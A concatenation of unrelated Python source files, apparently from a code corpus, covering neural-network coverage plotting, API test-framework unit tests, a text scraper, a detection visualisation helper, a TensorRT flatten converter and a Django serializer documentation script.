model_layer_dict = deepcopy(base_model_layer_dict) #make a deepcopy
coverage_vector = deepcopy(initial_coverage_vector)
print("initial coverage is: " + str(coverage_vector))
print(initial_coverage_vector)
corpus = [input for input in bim_set.tolist()]
corpus_len = len(corpus)
coverage_data = pd.DataFrame({"coverage":[]}) #empty dataframe
for i in range(5):
#randomize the corpus paths
random.seed(i)
corpus = random.sample(corpus, len(corpus))
#gradually update the vector (which we will plot)
for input in corpus:
update_neuron_coverage(input, model, model_layer_dict, threshold)
coverage_vector.append(get_neuron_coverage(model_layer_dict)[2])
coverage_data = coverage_data.append(pd.DataFrame({'adversarial images added':range(len(coverage_vector)),"coverage":coverage_vector}))
coverage_vector = deepcopy(initial_coverage_vector)
np.save(model_name+"_"+attack_name+"_neuron"+"_threshold_"+str(threshold).replace('.',',')+"_group_size_"+str(group_size),np.array(coverage_vector))
sns.lineplot(x="adversarial images added",y="coverage",data=coverage_data.reset_index())
plt.savefig("graph of "+model_name+"_"+attack_name+"_neuron"+"_threshold_"+str(threshold).replace('.',',')+"_group_size_"+str(group_size))
plt.clf()
|
the-stack_0_6126 | import os
import unittest
from ate import utils, runner
from ate.context import Context
from ate.exception import ParamsError
class VariableBindsUnittest(unittest.TestCase):
def setUp(self):
self.context = Context()
testcase_file_path = os.path.join(os.getcwd(), 'tests/data/demo_binds.yml')
self.testcases = utils.load_testcases(testcase_file_path)
def test_context_bind_testset_variables(self):
# testcase in JSON format
testcase1 = {
"variable_binds": [
{"GLOBAL_TOKEN": "debugtalk"},
{"token": "$GLOBAL_TOKEN"}
]
}
# testcase in YAML format
testcase2 = self.testcases["bind_variables"]
for testcase in [testcase1, testcase2]:
variable_binds = testcase['variable_binds']
self.context.bind_variables(variable_binds, level="testset")
testset_variables = self.context.testset_shared_variables_mapping
testcase_variables = self.context.get_testcase_variables_mapping()
self.assertIn("GLOBAL_TOKEN", testset_variables)
self.assertIn("GLOBAL_TOKEN", testcase_variables)
self.assertEqual(testset_variables["GLOBAL_TOKEN"], "debugtalk")
self.assertIn("token", testset_variables)
self.assertIn("token", testcase_variables)
self.assertEqual(testset_variables["token"], "debugtalk")
def test_context_bind_testcase_variables(self):
testcase1 = {
"variable_binds": [
{"GLOBAL_TOKEN": "debugtalk"},
{"token": "$GLOBAL_TOKEN"}
]
}
testcase2 = self.testcases["bind_variables"]
for testcase in [testcase1, testcase2]:
variable_binds = testcase['variable_binds']
self.context.bind_variables(variable_binds)
testset_variables = self.context.testset_shared_variables_mapping
testcase_variables = self.context.get_testcase_variables_mapping()
self.assertNotIn("GLOBAL_TOKEN", testset_variables)
self.assertIn("GLOBAL_TOKEN", testcase_variables)
self.assertEqual(testcase_variables["GLOBAL_TOKEN"], "debugtalk")
self.assertNotIn("token", testset_variables)
self.assertIn("token", testcase_variables)
self.assertEqual(testcase_variables["token"], "debugtalk")
def test_context_bind_lambda_functions(self):
testcase1 = {
"function_binds": {
"add_one": lambda x: x + 1,
"add_two_nums": lambda x, y: x + y
},
"variable_binds": [
{"add1": "${add_one(2)}"},
{"sum2nums": "${add_two_nums(2,3)}"}
]
}
testcase2 = self.testcases["bind_lambda_functions"]
for testcase in [testcase1, testcase2]:
function_binds = testcase.get('function_binds', {})
self.context.bind_functions(function_binds)
variable_binds = testcase['variable_binds']
self.context.bind_variables(variable_binds)
context_variables = self.context.get_testcase_variables_mapping()
self.assertIn("add1", context_variables)
self.assertEqual(context_variables["add1"], 3)
self.assertIn("sum2nums", context_variables)
self.assertEqual(context_variables["sum2nums"], 5)
def test_context_bind_lambda_functions_with_import(self):
testcase1 = {
"requires": ["random", "string", "hashlib"],
"function_binds": {
"gen_random_string": "lambda str_len: ''.join(random.choice(string.ascii_letters + string.digits) for _ in range(str_len))",
"gen_md5": "lambda *str_args: hashlib.md5(''.join(str_args).encode('utf-8')).hexdigest()"
},
"variable_binds": [
{"TOKEN": "debugtalk"},
{"random": "${gen_random_string(5)}"},
{"data": '{"name": "user", "password": "123456"}'},
{"authorization": "${gen_md5($TOKEN, $data, $random)}"}
]
}
testcase2 = self.testcases["bind_lambda_functions_with_import"]
for testcase in [testcase1, testcase2]:
requires = testcase.get('requires', [])
self.context.import_requires(requires)
function_binds = testcase.get('function_binds', {})
self.context.bind_functions(function_binds)
variable_binds = testcase['variable_binds']
self.context.bind_variables(variable_binds)
context_variables = self.context.get_testcase_variables_mapping()
self.assertIn("TOKEN", context_variables)
TOKEN = context_variables["TOKEN"]
self.assertEqual(TOKEN, "debugtalk")
self.assertIn("random", context_variables)
self.assertIsInstance(context_variables["random"], str)
self.assertEqual(len(context_variables["random"]), 5)
random = context_variables["random"]
self.assertIn("data", context_variables)
data = context_variables["data"]
self.assertIn("authorization", context_variables)
self.assertEqual(len(context_variables["authorization"]), 32)
authorization = context_variables["authorization"]
self.assertEqual(utils.gen_md5(TOKEN, data, random), authorization)
def test_import_module_functions(self):
testcase1 = {
"import_module_functions": ["tests.data.custom_functions"],
"variable_binds": [
{"TOKEN": "debugtalk"},
{"random": "${gen_random_string(5)}"},
{"data": '{"name": "user", "password": "123456"}'},
{"authorization": "${gen_md5($TOKEN, $data, $random)}"}
]
}
testcase2 = self.testcases["bind_module_functions"]
for testcase in [testcase1, testcase2]:
module_functions = testcase.get('import_module_functions', [])
self.context.import_module_functions(module_functions)
variable_binds = testcase['variable_binds']
self.context.bind_variables(variable_binds)
context_variables = self.context.get_testcase_variables_mapping()
self.assertIn("TOKEN", context_variables)
TOKEN = context_variables["TOKEN"]
self.assertEqual(TOKEN, "debugtalk")
self.assertIn("random", context_variables)
self.assertIsInstance(context_variables["random"], str)
self.assertEqual(len(context_variables["random"]), 5)
random = context_variables["random"]
self.assertIn("data", context_variables)
data = context_variables["data"]
self.assertIn("authorization", context_variables)
self.assertEqual(len(context_variables["authorization"]), 32)
authorization = context_variables["authorization"]
self.assertEqual(utils.gen_md5(TOKEN, data, random), authorization)
def test_register_request(self):
request_dict = {
"url": "http://debugtalk.com",
"method": "GET",
"headers": {
"Content-Type": "application/json",
"USER-AGENT": "ios/10.3"
}
}
self.context.register_request(request_dict)
parsed_request = self.context.get_parsed_request()
self.assertIn("content-type", parsed_request["headers"])
self.assertIn("user-agent", parsed_request["headers"])
request_dict = {
"headers": "invalid headers"
}
with self.assertRaises(ParamsError):
self.context.register_request(request_dict)
def test_get_parsed_request(self):
test_runner = runner.Runner()
testcase = {
"import_module_functions": ["tests.data.custom_functions"],
"variable_binds": [
{"TOKEN": "debugtalk"},
{"random": "${gen_random_string(5)}"},
{"data": '{"name": "user", "password": "123456"}'},
{"authorization": "${gen_md5($TOKEN, $data, $random)}"}
],
"request": {
"url": "http://127.0.0.1:5000/api/users/1000",
"method": "POST",
"headers": {
"Content-Type": "application/json",
"authorization": "$authorization",
"random": "$random"
},
"data": "$data"
}
}
test_runner.init_config(testcase, level="testcase")
parsed_request = test_runner.context.get_parsed_request()
self.assertIn("authorization", parsed_request["headers"])
self.assertEqual(len(parsed_request["headers"]["authorization"]), 32)
self.assertIn("random", parsed_request["headers"])
self.assertEqual(len(parsed_request["headers"]["random"]), 5)
self.assertIn("data", parsed_request)
self.assertEqual(parsed_request["data"], testcase["variable_binds"][2]["data"])
|
the-stack_0_6128 | height = int(input())
for i in range(height,0,-1):
for j in range(i,height):
print(end=" ")
for j in range(1,i+1):
if(i%2 == 0):
print(j,end=" ")
else:
c = chr(j+64)
print(c,end=" ")
print()
# Sample Input :- 5
# Output :-
# A B C D E
# 1 2 3 4
# A B C
# 1 2
# A
|
the-stack_0_6129 | """Contains functions to scrap the text from URLs given by Bing."""
import logging
import re
from typing import Tuple, List, Union
from newspaper import Article
from nltk.corpus.reader.wordnet import Synset
from filepath_handler import get_article_dir, get_url_path
logger = logging.getLogger(__name__)
def grab_text(subject: Synset, id_url: Tuple[int, str]) -> Union[str, None]:
"""Main function to crawl text."""
doc_id, url = id_url
filepath = get_article_dir(subject) / f"{doc_id}.txt"
# clean old content
with filepath.open("w+") as f:
f.write("")
try:
article = Article(url, language="en")
article.download()
article.parse()
text = clean_text(article.text)
with filepath.open("w+") as f:
f.write(text)
return text
except Exception as e:
logger.warning(f"Subject {subject.name()} - Could not crawl {url}. Error: {e.args}")
def clean_text(text: str) -> str:
"""Some simple processes to clean the crawled text."""
arr = []
for line in re.compile(r'\n+').split(text):
line = line.strip()
if not line:
continue
line = re.compile(r'\[\d[\d,\- ]*\]').sub("", line) # remove citations
arr.append(line.strip())
return "\n".join(arr)
def get_urls(subject: Synset) -> List[str]:
"""Get all URLs returned by the Bing API."""
url_filepath = get_url_path(subject)
with url_filepath.open() as f:
urls = [line.strip() for line in f.readlines() if line.strip()]
return urls
|
the-stack_0_6131 | from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
import cv2
from .ddd_utils import compute_box_3d, project_to_image, draw_box_3d
class Debugger(object):
def __init__(self, ipynb=False, theme='black',
num_classes=-1, dataset=None, down_ratio=4):
self.ipynb = ipynb
if not self.ipynb:
import matplotlib.pyplot as plt
self.plt = plt
self.imgs = {}
self.theme = theme
colors = [(color_list[_]).astype(np.uint8) \
for _ in range(len(color_list))]
self.colors = np.array(colors, dtype=np.uint8).reshape(len(colors), 1, 1, 3)
if self.theme == 'white':
self.colors = self.colors.reshape(-1)[::-1].reshape(len(colors), 1, 1, 3)
self.colors = np.clip(self.colors, 0., 0.6 * 255).astype(np.uint8)
self.dim_scale = 1
self.names = pano_class_name
num_classes = len(self.names)
self.down_ratio=down_ratio
# for bird view
self.world_size = 64
self.out_size = 384
def add_img(self, img, img_id='default', revert_color=False):
if revert_color:
img = 255 - img
self.imgs[img_id] = img.copy()
def add_mask(self, mask, bg, imgId = 'default', trans = 0.8):
self.imgs[imgId] = (mask.reshape(
mask.shape[0], mask.shape[1], 1) * 255 * trans + \
bg * (1 - trans)).astype(np.uint8)
def show_img(self, pause = False, imgId = 'default'):
cv2.imshow('{}'.format(imgId), self.imgs[imgId])
if pause:
cv2.waitKey()
def add_blend_img(self, back, fore, img_id='blend', trans=0.7):
if self.theme == 'white':
fore = 255 - fore
if fore.shape[0] != back.shape[0] or fore.shape[0] != back.shape[1]:
fore = cv2.resize(fore, (back.shape[1], back.shape[0]))
if len(fore.shape) == 2:
fore = fore.reshape(fore.shape[0], fore.shape[1], 1)
self.imgs[img_id] = (back * (1. - trans) + fore * trans)
self.imgs[img_id][self.imgs[img_id] > 255] = 255
self.imgs[img_id][self.imgs[img_id] < 0] = 0
self.imgs[img_id] = self.imgs[img_id].astype(np.uint8).copy()
'''
# slow version
def gen_colormap(self, img, output_res=None):
# num_classes = len(self.colors)
img[img < 0] = 0
h, w = img.shape[1], img.shape[2]
if output_res is None:
output_res = (h * self.down_ratio, w * self.down_ratio)
color_map = np.zeros((output_res[0], output_res[1], 3), dtype=np.uint8)
for i in range(img.shape[0]):
resized = cv2.resize(img[i], (output_res[1], output_res[0]))
resized = resized.reshape(output_res[0], output_res[1], 1)
cl = self.colors[i] if not (self.theme == 'white') \
else 255 - self.colors[i]
color_map = np.maximum(color_map, (resized * cl).astype(np.uint8))
return color_map
'''
def gen_colormap(self, img, output_res=None):
img = img.copy()
c, h, w = img.shape[0], img.shape[1], img.shape[2]
if output_res is None:
output_res = (h * self.down_ratio, w * self.down_ratio)
img = img.transpose(1, 2, 0).reshape(h, w, c, 1).astype(np.float32)
colors = np.array(
self.colors, dtype=np.float32).reshape(-1, 3)[:c].reshape(1, 1, c, 3)
if self.theme == 'white':
colors = 255 - colors
color_map = (img * colors).max(axis=2).astype(np.uint8)
color_map = cv2.resize(color_map, (output_res[0], output_res[1]))
return color_map
'''
# slow
def gen_colormap_hp(self, img, output_res=None):
# num_classes = len(self.colors)
# img[img < 0] = 0
h, w = img.shape[1], img.shape[2]
if output_res is None:
output_res = (h * self.down_ratio, w * self.down_ratio)
color_map = np.zeros((output_res[0], output_res[1], 3), dtype=np.uint8)
for i in range(img.shape[0]):
resized = cv2.resize(img[i], (output_res[1], output_res[0]))
resized = resized.reshape(output_res[0], output_res[1], 1)
cl = self.colors_hp[i] if not (self.theme == 'white') else \
(255 - np.array(self.colors_hp[i]))
color_map = np.maximum(color_map, (resized * cl).astype(np.uint8))
return color_map
'''
def gen_colormap_hp(self, img, output_res=None):
c, h, w = img.shape[0], img.shape[1], img.shape[2]
if output_res is None:
output_res = (h * self.down_ratio, w * self.down_ratio)
img = img.transpose(1, 2, 0).reshape(h, w, c, 1).astype(np.float32)
colors = np.array(
self.colors_hp, dtype=np.float32).reshape(-1, 3)[:c].reshape(1, 1, c, 3)
if self.theme == 'white':
colors = 255 - colors
color_map = (img * colors).max(axis=2).astype(np.uint8)
color_map = cv2.resize(color_map, (output_res[0], output_res[1]))
return color_map
def add_rect(self, rect1, rect2, c, conf=1, img_id='default'):
cv2.rectangle(
self.imgs[img_id], (rect1[0], rect1[1]), (rect2[0], rect2[1]), c, 2)
if conf < 1:
cv2.circle(self.imgs[img_id], (rect1[0], rect1[1]), int(10 * conf), c, 1)
cv2.circle(self.imgs[img_id], (rect2[0], rect2[1]), int(10 * conf), c, 1)
cv2.circle(self.imgs[img_id], (rect1[0], rect2[1]), int(10 * conf), c, 1)
cv2.circle(self.imgs[img_id], (rect2[0], rect1[1]), int(10 * conf), c, 1)
def add_coco_bbox(self, bbox, cat, conf=1, show_txt=True, img_id='default', teeth_num='0'):
bbox = np.array(bbox, dtype=np.int32)
# cat = (int(cat) + 1) % 80
cat = int(cat)
# print('cat', cat, self.names[cat])
c = self.colors[cat][0][0].tolist()
if self.theme == 'white':
c = (255 - np.array(c)).tolist()
txt = '{}({:.1f})'.format(teeth_num, conf)
font = cv2.FONT_HERSHEY_SIMPLEX
cat_size = cv2.getTextSize(txt, font, 0.5, 2)[0]
cv2.rectangle(
self.imgs[img_id], (bbox[0], bbox[1]), (bbox[2], bbox[3]), c, 2)
if show_txt:
cv2.rectangle(self.imgs[img_id],
(bbox[0], bbox[1] - cat_size[1] - 2),
(bbox[0] + cat_size[0], bbox[1] - 2), c, -1)
cv2.putText(self.imgs[img_id], txt, (bbox[0], bbox[1] - 2),
font, 0.5, (0, 0, 0), thickness=1, lineType=cv2.LINE_AA)
def add_center_point(self, point, img_id='default'):
cv2.circle(self.imgs[img_id], (point[0], point[1]), 3, (255, 255, 255), -1)
def add_coco_hp(self, points, img_id='default'):
points = np.array(points, dtype=np.int32).reshape(self.num_joints, 2)
for j in range(self.num_joints):
cv2.circle(self.imgs[img_id],
(points[j, 0], points[j, 1]), 3, self.colors_hp[j], -1)
for j, e in enumerate(self.edges):
if points[e].min() > 0:
cv2.line(self.imgs[img_id], (points[e[0], 0], points[e[0], 1]),
(points[e[1], 0], points[e[1], 1]), self.ec[j], 2,
lineType=cv2.LINE_AA)
def add_points(self, points, img_id='default'):
num_classes = len(points)
# assert num_classes == len(self.colors)
for i in range(num_classes):
for j in range(len(points[i])):
c = self.colors[i, 0, 0]
cv2.circle(self.imgs[img_id], (points[i][j][0] * self.down_ratio,
points[i][j][1] * self.down_ratio),
5, (255, 255, 255), -1)
cv2.circle(self.imgs[img_id], (points[i][j][0] * self.down_ratio,
points[i][j][1] * self.down_ratio),
3, (int(c[0]), int(c[1]), int(c[2])), -1)
def show_all_imgs(self, pause=False, time=0):
if not self.ipynb:
for i, v in self.imgs.items():
cv2.imshow('{}'.format(i), v)
if cv2.waitKey(0 if pause else 1) == 27:
import sys
sys.exit(0)
else:
self.ax = None
nImgs = len(self.imgs)
fig=self.plt.figure(figsize=(nImgs * 10,10))
nCols = nImgs
nRows = nImgs // nCols
for i, (k, v) in enumerate(self.imgs.items()):
fig.add_subplot(1, nImgs, i + 1)
if len(v.shape) == 3:
self.plt.imshow(cv2.cvtColor(v, cv2.COLOR_BGR2RGB))
else:
self.plt.imshow(v)
self.plt.show()
def save_img(self, imgId='default', path='../'):
cv2.imwrite(path + '{}.png'.format(imgId), self.imgs[imgId])
def save_all_imgs(self, path='./cache/debug/', prefix='', genID=False):
if genID:
try:
idx = int(np.loadtxt(path + '/id.txt'))
except:
idx = 0
prefix=idx
np.savetxt(path + '/id.txt', np.ones(1) * (idx + 1), fmt='%d')
for i, v in self.imgs.items():
cv2.imwrite(path + '/{}{}.png'.format(prefix, i), v)
def remove_side(self, img_id, img):
if not (img_id in self.imgs):
return
ws = img.sum(axis=2).sum(axis=0)
l = 0
while ws[l] == 0 and l < len(ws):
l+= 1
r = ws.shape[0] - 1
while ws[r] == 0 and r > 0:
r -= 1
hs = img.sum(axis=2).sum(axis=1)
t = 0
while hs[t] == 0 and t < len(hs):
t += 1
b = hs.shape[0] - 1
while hs[b] == 0 and b > 0:
b -= 1
self.imgs[img_id] = self.imgs[img_id][t:b+1, l:r+1].copy()
def project_3d_to_bird(self, pt):
pt[0] += self.world_size / 2
pt[1] = self.world_size - pt[1]
pt = pt * self.out_size / self.world_size
return pt.astype(np.int32)
def add_ct_detection(
self, img, dets, show_box=False, show_txt=True,
center_thresh=0.5, img_id='det'):
# dets: max_preds x 5
self.imgs[img_id] = img.copy()
if type(dets) == type({}):
for cat in dets:
for i in range(len(dets[cat])):
if dets[cat][i, 2] > center_thresh:
cl = (self.colors[cat, 0, 0]).tolist()
ct = dets[cat][i, :2].astype(np.int32)
if show_box:
w, h = dets[cat][i, -2], dets[cat][i, -1]
x, y = dets[cat][i, 0], dets[cat][i, 1]
bbox = np.array([x - w / 2, y - h / 2, x + w / 2, y + h / 2],
dtype=np.float32)
self.add_coco_bbox(
bbox, cat - 1, dets[cat][i, 2],
show_txt=show_txt, img_id=img_id)
else:
for i in range(len(dets)):
if dets[i, 2] > center_thresh:
# print('dets', dets[i])
cat = int(dets[i, -1])
cl = (self.colors[cat, 0, 0] if self.theme == 'black' else \
255 - self.colors[cat, 0, 0]).tolist()
ct = dets[i, :2].astype(np.int32) * self.down_ratio
cv2.circle(self.imgs[img_id], (ct[0], ct[1]), 3, cl, -1)
if show_box:
w, h = dets[i, -3] * self.down_ratio, dets[i, -2] * self.down_ratio
x, y = dets[i, 0] * self.down_ratio, dets[i, 1] * self.down_ratio
bbox = np.array([x - w / 2, y - h / 2, x + w / 2, y + h / 2],
dtype=np.float32)
self.add_coco_bbox(bbox, dets[i, -1], dets[i, 2], img_id=img_id)
def add_3d_detection(
self, image_or_path, dets, calib, show_txt=False,
center_thresh=0.5, img_id='det'):
if isinstance(image_or_path, np.ndarray):
self.imgs[img_id] = image_or_path
else:
self.imgs[img_id] = cv2.imread(image_or_path)
for cat in dets:
for i in range(len(dets[cat])):
cl = (self.colors[cat - 1, 0, 0]).tolist()
if dets[cat][i, -1] > center_thresh:
dim = dets[cat][i, 5:8]
loc = dets[cat][i, 8:11]
rot_y = dets[cat][i, 11]
# loc[1] = loc[1] - dim[0] / 2 + dim[0] / 2 / self.dim_scale
# dim = dim / self.dim_scale
if loc[2] > 1:
box_3d = compute_box_3d(dim, loc, rot_y)
box_2d = project_to_image(box_3d, calib)
self.imgs[img_id] = draw_box_3d(self.imgs[img_id], box_2d, cl)
def compose_vis_add(
self, img_path, dets, calib,
center_thresh, pred, bev, img_id='out'):
self.imgs[img_id] = cv2.imread(img_path)
# h, w = self.imgs[img_id].shape[:2]
# pred = cv2.resize(pred, (h, w))
h, w = pred.shape[:2]
hs, ws = self.imgs[img_id].shape[0] / h, self.imgs[img_id].shape[1] / w
self.imgs[img_id] = cv2.resize(self.imgs[img_id], (w, h))
self.add_blend_img(self.imgs[img_id], pred, img_id)
for cat in dets:
for i in range(len(dets[cat])):
cl = (self.colors[cat - 1, 0, 0]).tolist()
if dets[cat][i, -1] > center_thresh:
dim = dets[cat][i, 5:8]
loc = dets[cat][i, 8:11]
rot_y = dets[cat][i, 11]
# loc[1] = loc[1] - dim[0] / 2 + dim[0] / 2 / self.dim_scale
# dim = dim / self.dim_scale
if loc[2] > 1:
box_3d = compute_box_3d(dim, loc, rot_y)
box_2d = project_to_image(box_3d, calib)
box_2d[:, 0] /= hs
box_2d[:, 1] /= ws
self.imgs[img_id] = draw_box_3d(self.imgs[img_id], box_2d, cl)
self.imgs[img_id] = np.concatenate(
[self.imgs[img_id], self.imgs[bev]], axis=1)
def add_2d_detection(
self, img, dets, show_box=False, show_txt=True,
center_thresh=0.5, img_id='det'):
self.imgs[img_id] = img
for cat in dets:
for i in range(len(dets[cat])):
cl = (self.colors[cat - 1, 0, 0]).tolist()
if dets[cat][i, -1] > center_thresh:
bbox = dets[cat][i, 1:5]
self.add_coco_bbox(
bbox, cat - 1, dets[cat][i, -1],
show_txt=show_txt, img_id=img_id)
def add_bird_view(self, dets, center_thresh=0.3, img_id='bird'):
bird_view = np.ones((self.out_size, self.out_size, 3), dtype=np.uint8) * 230
for cat in dets:
cl = (self.colors[cat - 1, 0, 0]).tolist()
lc = (250, 152, 12)
for i in range(len(dets[cat])):
if dets[cat][i, -1] > center_thresh:
dim = dets[cat][i, 5:8]
loc = dets[cat][i, 8:11]
rot_y = dets[cat][i, 11]
rect = compute_box_3d(dim, loc, rot_y)[:4, [0, 2]]
for k in range(4):
rect[k] = self.project_3d_to_bird(rect[k])
# cv2.circle(bird_view, (rect[k][0], rect[k][1]), 2, lc, -1)
cv2.polylines(
bird_view,[rect.reshape(-1, 1, 2).astype(np.int32)],
True,lc,2,lineType=cv2.LINE_AA)
for e in [[0, 1]]:
t = 4 if e == [0, 1] else 1
cv2.line(bird_view, (rect[e[0]][0], rect[e[0]][1]),
(rect[e[1]][0], rect[e[1]][1]), lc, t,
lineType=cv2.LINE_AA)
self.imgs[img_id] = bird_view
def add_bird_views(self, dets_dt, dets_gt, center_thresh=0.3, img_id='bird'):
alpha = 0.5
bird_view = np.ones((self.out_size, self.out_size, 3), dtype=np.uint8) * 230
for ii, (dets, lc, cc) in enumerate(
[(dets_gt, (12, 49, 250), (0, 0, 255)),
(dets_dt, (250, 152, 12), (255, 0, 0))]):
# cc = np.array(lc, dtype=np.uint8).reshape(1, 1, 3)
for cat in dets:
cl = (self.colors[cat - 1, 0, 0]).tolist()
for i in range(len(dets[cat])):
if dets[cat][i, -1] > center_thresh:
dim = dets[cat][i, 5:8]
loc = dets[cat][i, 8:11]
rot_y = dets[cat][i, 11]
rect = compute_box_3d(dim, loc, rot_y)[:4, [0, 2]]
for k in range(4):
rect[k] = self.project_3d_to_bird(rect[k])
if ii == 0:
cv2.fillPoly(
bird_view,[rect.reshape(-1, 1, 2).astype(np.int32)],
lc,lineType=cv2.LINE_AA)
else:
cv2.polylines(
bird_view,[rect.reshape(-1, 1, 2).astype(np.int32)],
True,lc,2,lineType=cv2.LINE_AA)
# for e in [[0, 1], [1, 2], [2, 3], [3, 0]]:
for e in [[0, 1]]:
t = 4 if e == [0, 1] else 1
cv2.line(bird_view, (rect[e[0]][0], rect[e[0]][1]),
(rect[e[1]][0], rect[e[1]][1]), lc, t,
lineType=cv2.LINE_AA)
self.imgs[img_id] = bird_view
kitti_class_name = [
'p', 'v', 'b'
]
gta_class_name = [
'p', 'v'
]
pascal_class_name = ["aeroplane", "bicycle", "bird", "boat", "bottle", "bus",
"car", "cat", "chair", "cow", "diningtable", "dog", "horse", "motorbike",
"person", "pottedplant", "sheep", "sofa", "train", "tvmonitor"]
coco_class_name = [
'person', 'bicycle', 'car', 'motorcycle', 'airplane',
'bus', 'train', 'truck', 'boat', 'traffic light', 'fire hydrant',
'stop sign', 'parking meter', 'bench', 'bird', 'cat', 'dog', 'horse',
'sheep', 'cow', 'elephant', 'bear', 'zebra', 'giraffe', 'backpack',
'umbrella', 'handbag', 'tie', 'suitcase', 'frisbee', 'skis',
'snowboard', 'sports ball', 'kite', 'baseball bat', 'baseball glove',
'skateboard', 'surfboard', 'tennis racket', 'bottle', 'wine glass',
'cup', 'fork', 'knife', 'spoon', 'bowl', 'banana', 'apple', 'sandwich',
'orange', 'broccoli', 'carrot', 'hot dog', 'pizza', 'donut', 'cake',
'chair', 'couch', 'potted plant', 'bed', 'dining table', 'toilet', 'tv',
'laptop', 'mouse', 'remote', 'keyboard', 'cell phone', 'microwave',
'oven', 'toaster', 'sink', 'refrigerator', 'book', 'clock', 'vase',
'scissors', 'teddy bear', 'hair drier', 'toothbrush'
]
pano_class_name = ['o', 'x']
color_list = np.array(
[
1.000, 1.000, 1.000,
0.850, 0.325, 0.098,
0.929, 0.694, 0.125,
0.494, 0.184, 0.556,
0.466, 0.674, 0.188,
0.301, 0.745, 0.933,
0.635, 0.078, 0.184,
0.300, 0.300, 0.300,
0.600, 0.600, 0.600,
1.000, 0.000, 0.000,
1.000, 0.500, 0.000,
0.749, 0.749, 0.000,
0.000, 1.000, 0.000,
0.000, 0.000, 1.000,
0.667, 0.000, 1.000,
0.333, 0.333, 0.000,
0.333, 0.667, 0.000,
0.333, 1.000, 0.000,
0.667, 0.333, 0.000,
0.667, 0.667, 0.000,
0.667, 1.000, 0.000,
1.000, 0.333, 0.000,
1.000, 0.667, 0.000,
1.000, 1.000, 0.000,
0.000, 0.333, 0.500,
0.000, 0.667, 0.500,
0.000, 1.000, 0.500,
0.333, 0.000, 0.500,
0.333, 0.333, 0.500,
0.333, 0.667, 0.500,
0.333, 1.000, 0.500,
0.667, 0.000, 0.500,
0.667, 0.333, 0.500,
0.667, 0.667, 0.500,
0.667, 1.000, 0.500,
1.000, 0.000, 0.500,
1.000, 0.333, 0.500,
1.000, 0.667, 0.500,
1.000, 1.000, 0.500,
0.000, 0.333, 1.000,
0.000, 0.667, 1.000,
0.000, 1.000, 1.000,
0.333, 0.000, 1.000,
0.333, 0.333, 1.000,
0.333, 0.667, 1.000,
0.333, 1.000, 1.000,
0.667, 0.000, 1.000,
0.667, 0.333, 1.000,
0.667, 0.667, 1.000,
0.667, 1.000, 1.000,
1.000, 0.000, 1.000,
1.000, 0.333, 1.000,
1.000, 0.667, 1.000,
0.167, 0.000, 0.000,
0.333, 0.000, 0.000,
0.500, 0.000, 0.000,
0.667, 0.000, 0.000,
0.833, 0.000, 0.000,
1.000, 0.000, 0.000,
0.000, 0.167, 0.000,
0.000, 0.333, 0.000,
0.000, 0.500, 0.000,
0.000, 0.667, 0.000,
0.000, 0.833, 0.000,
0.000, 1.000, 0.000,
0.000, 0.000, 0.167,
0.000, 0.000, 0.333,
0.000, 0.000, 0.500,
0.000, 0.000, 0.667,
0.000, 0.000, 0.833,
0.000, 0.000, 1.000,
0.000, 0.000, 0.000,
0.143, 0.143, 0.143,
0.286, 0.286, 0.286,
0.429, 0.429, 0.429,
0.571, 0.571, 0.571,
0.714, 0.714, 0.714,
0.857, 0.857, 0.857,
0.000, 0.447, 0.741,
0.50, 0.5, 0
]
).astype(np.float32)
color_list = color_list.reshape((-1, 3)) * 255
|
the-stack_0_6132 | from torch2trt.torch2trt import *
from torch2trt.module_test import add_module_test
from .identity import *
@tensorrt_converter('torch.Tensor.flatten')
@tensorrt_converter('torch.flatten')
def convert_flatten(ctx):
input = ctx.method_args[0]
start_dim = get_arg(ctx, 'start_dim', pos=1, default=0)
end_dim = get_arg(ctx, 'end_dim', pos=2, default=-1)
if start_dim==-1:
start_dim = len(input.shape)-1
if end_dim==-1:
end_dim = len(input.shape)-1
if start_dim == end_dim:
ctx.method_args = [input]
convert_identity(ctx)
return
input_trt = trt_(ctx.network, input)
shape_trt = ctx.network.add_shape(input_trt).get_output(0)
output = ctx.method_return
shape1_trt = None
shape2_trt = None
if start_dim != 0:
slice1_start = [0]
slice1_size = [start_dim]
slice1_stride = [1]
shape1_trt = ctx.network.add_slice(shape_trt, slice1_start, slice1_size, slice1_stride).get_output(0)
if end_dim != len(input.shape)-1:
slice2_start = [end_dim+1]
slice2_size = [len(input.shape)-end_dim-1]
slice2_stride = [1]
shape2_trt = ctx.network.add_slice(shape_trt, slice2_start, slice2_size, slice2_stride).get_output(0)
slice_mid_start = [start_dim]
slice_mid_size = [end_dim-start_dim+1]
slice_mid_stride = [1]
shape_mid_trt = ctx.network.add_slice(shape_trt, slice_mid_start, slice_mid_size, slice_mid_stride).get_output(0)
# reduce mid
mid_trt = ctx.network.add_slice(shape_mid_trt, [0], [1], [1]).get_output(0)
for i in range(end_dim-start_dim):
other_trt = ctx.network.add_slice(shape_mid_trt, [i+1], [1], [1]).get_output(0)
mid_trt = ctx.network.add_elementwise(mid_trt, other_trt, trt.ElementWiseOperation.PROD).get_output(0)
# mid_trt = ctx.network.add_reduce(shape_mid_trt, trt.ReduceOperation.PROD, axes=1, keep_dims=True).get_output(0)
shape_mid_trt = mid_trt
if shape1_trt == None:
new_shape_trt = ctx.network.add_concatenation([shape_mid_trt, shape2_trt]).get_output(0)
elif shape2_trt == None:
new_shape_trt = ctx.network.add_concatenation([shape1_trt, shape_mid_trt]).get_output(0)
else:
new_shape_trt = ctx.network.add_concatenation([shape1_trt, shape_mid_trt, shape2_trt]).get_output(0)
layer = ctx.network.add_shuffle(input_trt)
layer.set_input(1, new_shape_trt)
output._trt = layer.get_output(0) |
the-stack_0_6137 | #!/usr/bin/env python3
import argparse
import inspect
import json
import os
import sys
from functools import partial
from importlib import import_module
from fan_tools.doc_utils.fan_sphinx.dyn_json import serializer_doc_info
from django.core.serializers.json import DjangoJSONEncoder
from rest_framework_dyn_serializer import DynModelSerializer
def compose(*funs):
it = funs[-1]
funs = funs[:-1]
def inner(*args, **kwargs):
for res in it(*args, **kwargs):
for fun in funs:
res = fun(res)
if inspect.isgenerator(res):
for r in res:
yield r
else:
yield res
return inner
def get_modules(apps):
for app in apps:
for mod in ('serializers', 'forms'):
try:
yield import_module('{}.{}'.format(app, mod))
except ImportError:
pass
except AttributeError:
pass
def get_dynserializers(module):
filters = (
lambda i: inspect.isclass(i),
lambda i: i != DynModelSerializer,
lambda i: not (hasattr(i, 'Meta') and getattr(i.Meta, 'abstract', False)),
